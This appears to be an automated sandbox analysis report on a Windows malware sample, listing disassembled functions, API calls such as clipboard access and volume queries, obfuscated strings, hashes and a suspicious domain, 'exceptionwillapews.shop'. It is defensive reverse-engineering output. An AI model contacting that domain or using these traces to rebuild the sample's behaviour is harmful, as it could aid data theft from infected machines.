                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 108 40d5d0-40d5d2 109 40d5d4-40d6df call 4092e0 108->109 110 40d59b-40d59f 108->110 113 40d6e1-40d6e4 109->113 114 40d728-40d7d4 109->114 110->108 117 40d6e6-40d721 113->117 115 40d7d6-40d7d9 114->115 116 40d817-40da4e ExitProcess * 4 114->116 118 40d7db-40d810 115->118 119 40da50-40da52 116->119 120 40da8f-40dae1 116->120 117->117 121 40d723-40d726 117->121 118->118 122 40d812-40d815 118->122 123 40da54-40da89 119->123 124 40dae3 120->124 125 40db19-40db44 call 40b320 120->125 121->114 122->116 123->123 126 40da8b-40da8d 123->126 127 40dae5-40db12 124->127 130 40db49-40db71 125->130 126->120 127->127 129 40db14-40db17 127->129 129->125
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: 8C$exceptionwillapews.shop
                                                                        • API String ID: 621844428-4113046735
                                                                        • Opcode ID: 4e885f4b103528a34ba8b05d68ad07885692d717e93b6dc83f6bf867971cc171
                                                                        • Instruction ID: e062613535a096f7c986de94b394a9a3299ac3684046ad9440d4ee051fa42249
                                                                        • Opcode Fuzzy Hash: 4e885f4b103528a34ba8b05d68ad07885692d717e93b6dc83f6bf867971cc171
                                                                        • Instruction Fuzzy Hash: F1220760508BC1CED726CF388498702BFA16B56224F1887DDD8E94F7E7C3799406CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 480 409240-40925c call 4092e0 call 436fd0 485 409260-409267 call 4321d0 480->485 486 40925e 480->486 490 409269 485->490 491 40926b-40929c GetStdHandle ExitProcess call 40a760 485->491 487 4092ae-4092ba ExitProcess 486->487 492 4092a5-4092ac call 4390c0 490->492 496 4092a0 call 410210 491->496 497 40929e 491->497 492->487 496->492 497->492
                                                                        APIs
                                                                        Strings
                                                                        • often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 0040927D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
                                                                        • API String ID: 621844428-3137510881
                                                                        • Opcode ID: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
                                                                        • Instruction ID: d46854307137c8737da70bb0dadd48020878a784c1cb78799af495398ee7fa65
                                                                        • Opcode Fuzzy Hash: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
                                                                        • Instruction Fuzzy Hash: 64F06871418200B7DA003B765A0765A7AA85F51314F11497FEDC1621C3EA7D4C46C66F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004340A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 661 4340a8-4340ff call 439a30 GetVolumeInformationW
                                                                        APIs
                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004340E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: InformationVolume
                                                                        • String ID: C$\
                                                                        • API String ID: 2039140958-514332402
                                                                        • Opcode ID: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
                                                                        • Instruction ID: 0b16e51853d0470085fd2b4e6c78b332ddd4def9cb37a61542a3d6919008bdae
                                                                        • Opcode Fuzzy Hash: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
                                                                        • Instruction Fuzzy Hash: DFE09275350741BBE728DF10EC27F1A3690D742744F10042CB242E91D0C7F57D108A5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004261A1 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 440COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !/$*
                                                                        • API String ID: 0-545799914
                                                                        • Opcode ID: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
                                                                        • Instruction ID: b2e27cbc9dde12e33a9927742966e6e389a792aa4b3f0ff258c4c825271f69ae
                                                                        • Opcode Fuzzy Hash: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
                                                                        • Instruction Fuzzy Hash: C4F13870205B918EE7268F35D4A47E3BBE1BF17304F84499DD4EB8B282C77AA405CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004265CC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 373COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004266FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                        • String ID: !/$*
                                                                        • API String ID: 3960555810-545799914
                                                                        • Opcode ID: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
                                                                        • Instruction ID: 466006afd69678fcb0a440aae3b801bbbbe4bedcac6f7be2defe912c2a8870dc
                                                                        • Opcode Fuzzy Hash: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
                                                                        • Instruction Fuzzy Hash: 1DD137B0205B918EE7258F35D4A47E3BBE1BF17304F84496DD4EB8B282C77AA405CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004383AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID: D1B7
                                                                        • API String ID: 1029625771-1785272153
                                                                        • Opcode ID: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
                                                                        • Instruction ID: bda3516896a5f2ae45156be42eb04b2df876cef8185d1ab8fdc58d2902e9d8c2
                                                                        • Opcode Fuzzy Hash: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
                                                                        • Instruction Fuzzy Hash: 722171B4518301ABD708DF10D9A171FBBE2FBCA708F14992CE48547351E7748D05DB8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004391C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00439257
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: &QPS
                                                                        • API String ID: 1279760036-2176464483
                                                                        • Opcode ID: 3021ed5d250742d12213ae64843e51c017cf79448b4547ab576fc032e29171d0
                                                                        • Instruction ID: 4c527596ef4993cf958f93f33f8c539a2364bd56be8d93c3a76c3710f2140928
                                                                        • Opcode Fuzzy Hash: 3021ed5d250742d12213ae64843e51c017cf79448b4547ab576fc032e29171d0
                                                                        • Instruction Fuzzy Hash: A0011370208341AFE708CF00D4A476FBBE2FBC9318F248D5DE8A507681C7799919CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004359F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00435A87
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: &QPS
                                                                        • API String ID: 1279760036-2176464483
                                                                        • Opcode ID: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
                                                                        • Instruction ID: 3531a23c288a52d53f944b2c3e457840114f3fd3f8c40cca6c01df16574b446f
                                                                        • Opcode Fuzzy Hash: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
                                                                        • Instruction Fuzzy Hash: B9114570108341AFD708CF04D8A0B6FBBE2FB85328F248A1DE8A507681C739D9199BC6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042E6AB Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL ref: 0042E6C5
                                                                        • GetSystemMetrics.USER32 ref: 0042E6D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherMetricsSystemUser
                                                                        • String ID:
                                                                        • API String ID: 365337688-0
                                                                        • Opcode ID: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
                                                                        • Instruction ID: c70253705267066fe0a390eb40da1e2c454f4fe67f9f49903ef1b4541bef4a9f
                                                                        • Opcode Fuzzy Hash: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
                                                                        • Instruction Fuzzy Hash: 5F319BB46197408FD750EF39D985A1ABBF0BB89304F40892EE998C73A0E731A945CF46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02EE0223,?,?), ref: 02EE0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02EE0223,?,?), ref: 02EE0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 179eb12c8860f6d17e51d0351f74b3a90e9c5c64cc944f07b49318d719482cfa
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 08D0123114512877DB003A94DC09BCD7B1CDF05B66F008021FB0DE9180C7B0954046E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00438312 Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
                                                                        • Instruction ID: 1610e8cb5096fc1eed96c977c505dcc91df5b75474227e367c2d36b4526b057e
                                                                        • Opcode Fuzzy Hash: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
                                                                        • Instruction Fuzzy Hash: 00F0A574209340ABD708DB14D69099FFBE2AFCAA49F24881DE48583306C734EC43AE4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043914C Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004391B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
                                                                        • Instruction ID: da42185ebec8373d7b22ee920953178115992f0127cd58568fcf92c2ed0c5c99
                                                                        • Opcode Fuzzy Hash: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
                                                                        • Instruction Fuzzy Hash: 7B01D274508341AFE710CF14D88475BFBB2EBC6324F209E49E8A417695C3B5ED4A9B8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02FA3AD5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02FA3B26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857426384.0000000002FA3000.00000040.00000020.00020000.00000000.sdmp, Offset: 02FA3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2fa3000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: 499d03e1f81963b68e5665e559567470bb7a9908914b715efcf1ad45b4515105
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 9A113F79A00208EFDB01DF98C985E98BFF5AF08791F158094FA489B361D371EA50DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0042DDE0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 153clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                                        • String ID: 7$8$I$K$L$N
                                                                        • API String ID: 3829817484-2422513041
                                                                        • Opcode ID: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
                                                                        • Instruction ID: 8ed9dd40b2239205a4d96c9da8700085f56f38dffb9234c430860a7af855d13a
                                                                        • Opcode Fuzzy Hash: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
                                                                        • Instruction Fuzzy Hash: 0F5190B0A04740CFC721DF39D585616BBE0AF16314F548AADE8D68F796D334E805CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EFF180 Relevance: 15.5, Strings: 12, Instructions: 473COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
                                                                        • API String ID: 0-3498391054
                                                                        • Opcode ID: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                        • Instruction ID: 78618925fe82d32a1ef294eb2fa122c82099c3f2e249093d615f39f93c847d1b
                                                                        • Opcode Fuzzy Hash: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                        • Instruction Fuzzy Hash: 74520BB0205B858FE325CF25D494BD7BBE1BB06348F40891EC5EB5B686CB74A149CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041EF19 Relevance: 15.5, Strings: 12, Instructions: 473COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
                                                                        • API String ID: 0-3498391054
                                                                        • Opcode ID: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                        • Instruction ID: 62964ce6587a9f6e8b4bc72a90dd2b3cf09b0a553c01e9630c29236c2bf44c9c
                                                                        • Opcode Fuzzy Hash: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                        • Instruction Fuzzy Hash: D852FCB0205B858FE325CF25D494BD7BBE1BB06348F50892EC4EB5B645CB74A14ACF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041FBB5 Relevance: 15.5, Strings: 12, Instructions: 465COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
                                                                        • API String ID: 0-3498391054
                                                                        • Opcode ID: 17e1eef2c47546f5909f2ab459ea3df871a253adbcce23567c6d7a1e809ea18b
                                                                        • Instruction ID: 047a6880c081cc5f665bfd31f87bed186ae8e6b2cdbb109c5f5ad8525fb29fbb
                                                                        • Opcode Fuzzy Hash: 17e1eef2c47546f5909f2ab459ea3df871a253adbcce23567c6d7a1e809ea18b
                                                                        • Instruction Fuzzy Hash: 6F52FBB0205B858FE325CF25D494BD7BBE1BB06348F90891EC4EB5B646CB74A149CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EEFA34 Relevance: 13.8, Strings: 11, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: u=w$3yZ{$8MnO$9aBc$:m:o$Hik$M-q/$hI4K$u!|#$~w$q$s
                                                                        • API String ID: 0-1478902827
                                                                        • Opcode ID: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
                                                                        • Instruction ID: fb5d332356f676ff0d738ac038580c9cb666b456306b9c96d1a882a42d0e1583
                                                                        • Opcode Fuzzy Hash: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
                                                                        • Instruction Fuzzy Hash: CA51DAB45593C19BE674CF11D8A1B9FBBA1BB86344F608E1CD5D92B254CB308046CF96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F7CD Relevance: 13.8, Strings: 11, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: u=w$3yZ{$8MnO$9aBc$:m:o$Hik$M-q/$hI4K$u!|#$~w$q$s
                                                                        • API String ID: 0-1478902827
                                                                        • Opcode ID: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
                                                                        • Instruction ID: a799ed0fff6447343bd514cbacf28bedb163b3e05e2a36f77cc3edbc9f46f7b9
                                                                        • Opcode Fuzzy Hash: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
                                                                        • Instruction Fuzzy Hash: AA51EBB45193C19BE674CF11D891B9FBBA1BBC6340F608E1CD5D92B254CB30904ACF96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F044A7 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ##*8$&>95$)5>Q$7&"4$8C$rr}t$4f
                                                                        • API String ID: 0-3888404133
                                                                        • Opcode ID: 6cc54dea0f3e3a957238fb8843838014d14fc5ef7f96927021fe5273e1921ce4
                                                                        • Instruction ID: f285f9eac9a203330c7eb205bb62f66e3db67cc7bb7f74b4e22e3671583ee319
                                                                        • Opcode Fuzzy Hash: 6cc54dea0f3e3a957238fb8843838014d14fc5ef7f96927021fe5273e1921ce4
                                                                        • Instruction Fuzzy Hash: 3D9135B4545B808AE3268F25C8A0BE7BBE1BF47349F140A9CC5EB0B685C376B405CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424240 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: ##*8$&>95$)5>Q$7&"4$8C$rr}t$4f
                                                                        • API String ID: 1279760036-3888404133
                                                                        • Opcode ID: 75e9084bf7dc8f8358964003a6f28c1663de380da6f4640a1865e0df872f19a1
                                                                        • Instruction ID: 3f6742af25c925c888f3af746ffa36932763abd1f696094f3cdaf422b2e53c93
                                                                        • Opcode Fuzzy Hash: 75e9084bf7dc8f8358964003a6f28c1663de380da6f4640a1865e0df872f19a1
                                                                        • Instruction Fuzzy Hash: 4D9157B4245B90CBE3268F25D4A0BE3BBE1FF56309F540A5DC4EB0B285C37AA4458F95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041D128 Relevance: 6.7, Strings: 5, Instructions: 493COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "frc$#m8j$&zqi$=ksw$deks
                                                                        • API String ID: 0-420180677
                                                                        • Opcode ID: 24fb457cb41431979cf467ed9e60fa379f1c1d026843b3a604b61835dc222ffe
                                                                        • Instruction ID: c58cb54646a3eb14b49da7c51523dbab074ab8a0297049e6d9acae5f9d3fd762
                                                                        • Opcode Fuzzy Hash: 24fb457cb41431979cf467ed9e60fa379f1c1d026843b3a604b61835dc222ffe
                                                                        • Instruction Fuzzy Hash: B2029FB59083559FC324CF18C49076BBBE2BF86308F588A6DE4D59B391D738E841CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE9F87 Relevance: 6.7, Strings: 5, Instructions: 468COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
